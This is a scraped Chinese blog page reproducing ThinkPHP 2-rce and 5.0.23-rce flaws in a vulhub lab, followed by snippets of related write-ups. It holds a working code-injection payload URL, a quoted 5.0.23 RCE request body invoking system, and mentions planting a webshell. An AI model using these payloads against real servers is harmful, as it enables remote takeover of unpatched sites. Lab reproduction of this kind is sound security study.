【vulhub】thinkphp5 2-rce 5.0.23-rce 5-rce 漏洞复现

最新推荐文章于 2025-05-31 11:26:04 发布

原创

最新推荐文章于 2025-05-31 11:26:04 发布 · 914 阅读

4 ·

CC 4.0 BY-SA版权

文章标签：

#sql #安全

2-rec

1.启动环境

cd /.../vulhub/thinkphp/2-rce  # cd进入2-rce靶场文件环境下
docker-compose up -d          # docker-compose启动靶场
docker ps -a					   # 查看开启的靶场信息

2.访问192.168.146.136：8080网页

3.构造payload

http://192.168.146.136:8080/?s=/Index/index/L/${@phpinfo()}

4.写入一句话木马使用蚁剑链接

5.0.23-rce

1.环境启动

最低0.47元/天解锁文章

200万优质内容无限畅学

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

一身傲骨@

关注关注

13
点赞
踩
4

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

[ vulhub漏洞复现篇 ] ThinkPHP 5.0.23-Rce

qq_51577576的博客

10-02

2790

[ vulhub漏洞复现篇 ] ThinkPHP 5.0.23-Rce 漏洞复现 ThinkPHP是一款运用极广的PHP开发框架。其5.0.23以前的版本中，获取method的方法中没有正确处理方法名，导致攻击者可以调用Request类任意方法并构造利用链，从而导致远程代码执行漏洞。

thinkphp v5.0.23 rce

qq_43647462的博客

08-23

3774

thinkphp v5.0.23 rce 复现 Buchiyexiao. thinkphp是一个轻量级的框架，其中在thinkphp5版本中出现了很多命令执行漏洞，本文分析采用的代码使用的是thinkphp版本v5.0.23（目的是匹配docker搭建的thinkphp环境的版本）漏洞位置 thinkphp5的主要漏洞位置位于处理请求的Request类中，其中存在method方法，简单阅读发现该方法目的是为了获取当前的请求类型，因为我没有传入任何请求，所以get，post等的数组为空其中var

参与评论您还未登录，请先登录后发表或查看评论

Thinkphp5.0.23-rce

最新发布

jiangzhen5566的博客

05-31

337

这块代码就是赋值,将他们赋值，filter = ['system'] ,method = ['get'] , server = ['REQUEST_METHOD' => 'whoami']开始时候$options[]数组为空，经过$this->input = file_get_contents('php://input');所以构造出来了call_user_func_array("system","whoami");最后的最后执行了命令。但是不知道为什么执行不了命令，应该是执行了，传马直接给杀了。

Thinkphp5.0.23 rce

Continuejww的博客

02-23

1288

ThinkPHP是中国使用极其广泛的PHP开发框架。在其 5.0（

thinkphp 5.0.23-rce

weixin_51692662的博客

11-02

273

thinkphp 5.0.23-rce

Thinkphp5.0.23 rce（远程代码执行）

Lucky1youzi的博客

01-20

1007

Thinkphp5.0.23 rce（远程代码执行）

ThinkPHP5 5.0.23-rce远程代码执行漏洞复现

qq_45079558的博客

09-08

456

其版本5中，由于框架对控制器名没有进行足够的检测，会导致在没有开启强制路由的情况下可执行任意方法，从而导致远程命令执行漏洞。通过echo命令写入 Webshell 文件,首先将一句话木马进行Base64 编码。判断是否存在漏洞：访问/index.php?s=captcha页面，会出现如下报错。切换目录到vulhub/thinkphp/5.0.23-rce下。使用HackBar 插件发送 POST 请求。端口为:8080,访问网站，搭建成功。访问shell.php，使用蚁剑连接。

代码审计之ThinkPHP 5.0-5.0.23RCE

m0_63581584的博客

11-23

726

2.2，回到app->run方法中。调用call_user_func()，造成RCE。2.1 第一步造成变量覆盖。进入App-run()方法。这里debug开启，即进入。2.开始进行RCE分析。

BUUCTF-Real-ThinkPHP]5.0.23-Rce

02-02

973

[ThinkPHP]5.0.23版本，RCE远程代码执行漏洞！

ThinkPHP--5.0.23-rce远程代码执行

m0_74402888的博客

05-03

928

实现框架的核心类Requests的method方法实现表单请求类伪装，默认为$_POST[‘_method’]变量，却没有对_method属性进行严格校验，可以通过变量覆盖Requests类的属性，在结合框架特性实现对任意函数的调用实现任意代码执行。攻击者可向缓存文件内写入PHP代码，导致远程代码执行。

Thinkphp 5.0.23 rce复现（新手)

nqzh001的博客

12-18

1483

今天学习使用docker复现Thinkphp 5.0.23 rce漏洞使用docker配合Vulhub一键搭建漏洞测试靶场； Vulhub搭建地址 https://vulhub.org/#/docs/run/ 这边推荐使用Ubuntu，之前使用CentOS搭建总是出现各种错误。搭建成功后，开始访问直接上poc _method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=id 这个id就是想要

thinkphp反序列化漏洞(5.0.23-rce)

SuperherRo的博客

09-27

457

本文只聚焦于贴合实际情况下如何从黑盒角度发现漏洞到利用漏洞的一个完整流程。

ThinkPHP5.0.0~5.0.23路由控制不严谨导致的RCE

shelter1234567的博客

01-22

1493

本次我们继续以漏洞挖掘者的视角，来分析thinkphp的RCE。

vulhub thinkphp漏洞复现 | in-sqliniection、2-rce、5.0.23-rce、5-rce漏洞复现（详细图解）

鱼溯的博客

02-02

2424

vulhub thinkphp漏洞复现 | in-sqliniection、2-rce、5.0.23-rce、5-rce漏洞复现（详细图解）

Thinkphp5.0.23-rce漏洞复现

qq_64875725的博客

06-02

2737

ThinkPHP是一款运用极广的PHP开发框架。其5.0.23以前的版本中，获取method的方法中没有正确处理方法名，导致攻击者可以调用Request类任意方法并构造利用链，从而导致远程代码执行漏洞。: 'GET';} elseif (!} else {

Thiinkphp 5.0.23-rce 漏洞复现（vulhub）

MDSEC的博客

08-22

416

形成原因是因为其5.0.23以前的版本中，获取method的方法中没有正确处理方法名，导致攻击者可以调用Request类任意方法并构造利用链，从而导致远程代码执行漏洞。这样thinkphp 5.0.23-rce漏洞就复现完成了。2>.bp抓包修改post请求，传递参数。响应包状态码为500，但是可以访问页面。访问8080端口的本机地址。尝试写入phpinfo。

ThinkPHP 5.0.0-23 RCE漏洞深度剖析与修复策略

ThinkPHP 5.0.0至5.0.23版本存在远程代码执行（RCE）漏洞分析。2019年1月11日，ThinkPHP官方发布安全补丁，修复了一个GETSHELL漏洞。本文将深入剖析这一漏洞，并提供漏洞重现步骤以及利用PoC（Proof of Concept，...